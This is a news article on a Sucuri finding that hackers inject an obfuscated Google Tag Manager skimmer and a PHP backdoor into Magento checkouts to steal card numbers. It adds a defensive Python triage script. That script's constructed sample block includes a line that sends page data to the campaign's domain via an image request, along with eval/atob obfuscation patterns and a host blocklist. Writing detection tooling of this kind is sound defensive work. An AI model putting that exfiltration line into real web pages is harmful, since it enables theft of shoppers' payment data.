Hackers Use Google Tag Manager to Steal Credit Card Numbers via @sejournal, @martinibuster


Google Tag Manager (GTM) is being used by hackers to deliver malware that steals credit card numbers during checkout.

Hackers Use Google Tag Manager to Steal Credit Card Numbers

Hackers are actively exploiting a vulnerability to inject an obfuscated script into Magento-based eCommerce websites. The malware is loaded via Google Tag Manager, allowing them to steal credit card numbers when customers check out. A hidden PHP backdoor is used to keep the malicious code on the site and to steal user data.

The credit card skimmer was discovered by security researchers at Sucuri, who report that the malware was loaded from a database table, cms_block.content. The injected Google Tag Manager (GTM) snippet on the website looks like a normal tag at first glance because the malicious payload inside it is obfuscated to evade detection.

Once the malware was active, it would record credit card information from a Magento eCommerce checkout page and send it to an external server controlled by the attacker.

Sucuri security researchers also discovered a backdoor PHP file. PHP files are the ‘building blocks’ of many dynamic websites built on platforms like Magento, WordPress, Drupal, and Joomla, so a malicious PHP file, once injected, can run with the same privileges as the content management system itself and survive cleanup of the database-stored script.

This is the PHP file that researchers identified:

./media/index.php.

According to the advisory published on the Sucuri website:

“At the time of writing this article, we found that at least 6 websites were currently infected with this particular Google Tag Manager ID, indicating that this threat is actively affecting multiple sites.

eurowebmonitortool[.]com is used in this malicious campaign and is currently blocklisted by 15 security vendors at VirusTotal.”

VirusTotal.com is a crowdsourced security service that provides free file scanning and acts as an aggregator of security vendor verdicts.

Sucuri advises the following steps for cleaning an infected website:

  • “Remove any suspicious GTM tags. Log into GTM, identify, and delete any suspicious tags.
  • Perform a full website scan to detect any other malware or backdoors.
  • Remove any malicious scripts or backdoor files.
  • Ensure Magento and all extensions are up-to-date with security patches.
  • Regularly monitor site traffic and GTM for any unusual activity.”
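As an added example (not code from the Sucuri advisory, from Magento or from Google), the Python script below automates two of the checks a responder would run on a suspected site: it queries the cms_block table for rows that carry a script and flags GTM container IDs that are not on the shop's own allowlist, JavaScript obfuscation primitives, and the blocklisted host named in the advisory; and it lists PHP-executable files under the media directory, which Magento uses for uploads and where the ./media/index.php backdoor was found. The allowlisted container ID, the sample cms_block rows and the sample file tree are constructed for this demo; the real payload keeps the exfiltration host inside the encoded blob, so decoded strings should be rescanned with the same checks.

```python
"""Triage checks for a suspected Google Tag Manager skimmer on Magento.

Added example; not code from the Sucuri advisory, Magento, or Google. It
assumes the Magento cms_block table exposes (identifier, content) and that
./media is meant to hold uploads only, never executable PHP. The allowlist
of GTM container IDs, the sample rows and the sample file tree below are
constructed for this demo.
"""
import re
import sqlite3
import tempfile
from pathlib import Path

GTM_ID = re.compile(r"\bGTM-[A-Z0-9]{4,}\b")
SCRIPT_TAG = re.compile(r"<script\b", re.I)
# JS primitives that legitimate tag snippets rarely need but skimmers use to
# hide strings and the exfiltration endpoint.
OBFUSCATION = re.compile(r"\b(eval|atob|unescape|String\.fromCharCode)\s*\(")
HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# Domain named in the advisory (written there defanged as eurowebmonitortool[.]com).
BLOCKLISTED_HOSTS = {"eurowebmonitortool.com"}
PHP_SUFFIXES = {".php", ".phtml", ".phar", ".php5", ".php7"}


def inspect_block(content, allowed_gtm_ids):
    """Return the list of reasons this CMS block content deserves review."""
    reasons = []
    gtm_ids = set(GTM_ID.findall(content))
    for cid in sorted(gtm_ids - set(allowed_gtm_ids)):
        reasons.append(f"unknown GTM container {cid}")
    if SCRIPT_TAG.search(content) and not gtm_ids:
        reasons.append("inline <script> that is not a GTM loader")
    for prim in sorted(set(OBFUSCATION.findall(content))):
        reasons.append(f"obfuscation primitive {prim}(")
    for host in sorted({h.lower() for h in HOST.findall(content)}):
        if host in BLOCKLISTED_HOSTS:
            reasons.append(f"contacts blocklisted host {host}")
    return reasons


def scan_cms_blocks(conn, allowed_gtm_ids):
    """Query cms_block and return {identifier: reasons} for suspicious rows."""
    findings = {}
    rows = conn.execute(
        "SELECT identifier, content FROM cms_block WHERE content LIKE '%<script%'"
    )
    for identifier, content in rows:
        reasons = inspect_block(content or "", allowed_gtm_ids)
        if reasons:
            findings[identifier] = reasons
    return findings


def find_php_under(root):
    """Paths (relative to root) of PHP-executable files below an upload dir."""
    root = Path(root)
    return sorted(
        str(p.relative_to(root))
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in PHP_SUFFIXES
    )


# Standard GTM loader with a container the shop owns (constructed ID).
LEGIT_GTM = ("<!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];"
             "w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});"
             "var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;"
             "j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);"
             "})(window,document,'script','dataLayer','GTM-ABCD123');</script>")

# Constructed stand-in for an injected block: looks like a GTM loader but names a
# container the shop does not own and bundles an obfuscated payload. The base64
# here decodes to a harmless comment; real payloads hide the exfil host inside it.
INJECTED = (LEGIT_GTM.replace("GTM-ABCD123", "GTM-ZZZZ999")
            + "<script>eval(atob('Ly8gY29uc3RydWN0ZWQ='));"
            "new Image().src='https://eurowebmonitortool.com/c?d='+d;</script>")


def demo():
    """Run both checks against constructed data; returns (cms_findings, php_files)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_block (identifier TEXT, content TEXT)")
    conn.executemany("INSERT INTO cms_block VALUES (?, ?)", [
        ("footer_links", "<ul><li><a href='/contact'>Contact</a></li></ul>"),
        ("gtm_head", LEGIT_GTM),
        ("gtm_checkout", INJECTED),
        ("promo_banner", "<div>Sale</div><script>document.title='x'</script>"),
    ])
    cms_findings = scan_cms_blocks(conn, allowed_gtm_ids={"GTM-ABCD123"})

    with tempfile.TemporaryDirectory() as tmp:
        media = Path(tmp) / "media"
        (media / "catalog" / "product").mkdir(parents=True)
        (media / "catalog" / "product" / "shoe.jpg").write_bytes(b"\xff\xd8")
        (media / ".htaccess").write_text("Options -ExecCGI\n")
        (media / "index.php").write_text("<?php /* constructed backdoor stand-in */ ?>")
        php_files = find_php_under(media)
    return cms_findings, php_files


if __name__ == "__main__":
    blocks, php = demo()
    for ident, reasons in blocks.items():
        print(f"[cms_block] {ident}: " + "; ".join(reasons))
    for path in php:
        print(f"[media] PHP file where none belongs: {path}")
```

On a real site, replace the in-memory SQLite connection with a connection to the Magento database and point find_php_under at the store's media directory; any row flagged as an unknown container or blocklisted host, and any PHP file under media, should be preserved for forensics before it is removed, since the cleanup list above depends on knowing how the site was reinfected.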

Read the Sucuri advisory:

Google Tag Manager Skimmer Steals Credit Card Info From Magento Site


SEJ STAFF Roger Montti, Owner - Martinibuster.com
